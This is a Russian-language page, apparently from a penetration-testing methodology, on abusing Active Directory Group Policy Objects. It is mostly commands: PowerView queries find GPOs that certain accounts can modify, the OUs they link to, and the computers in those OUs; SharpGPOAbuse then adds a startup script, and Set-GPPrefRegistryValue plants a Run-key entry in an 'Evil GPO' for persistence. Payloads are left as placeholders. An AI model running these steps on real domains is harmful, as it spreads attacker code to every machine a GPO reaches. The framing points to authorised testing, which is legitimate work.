GPO

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
Соберите данные для картирования атаки (учётки, делегирование, доверия).
Двигайтесь по сценариям раздела с планом отката и контролем DC.
Команды и инструменты в блоках кода — на английском.

Методика

Modifiable GPOs

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>

Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName

Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName

.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"

Principals with Create groupPolicyContainer objects privilege

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandString

Порядок действий​

Методика​

Modifiable GPOs​

Principals with Create groupPolicyContainer objects privilege​

Порядок действий

Методика

Modifiable GPOs

Principals with Create groupPolicyContainer objects privilege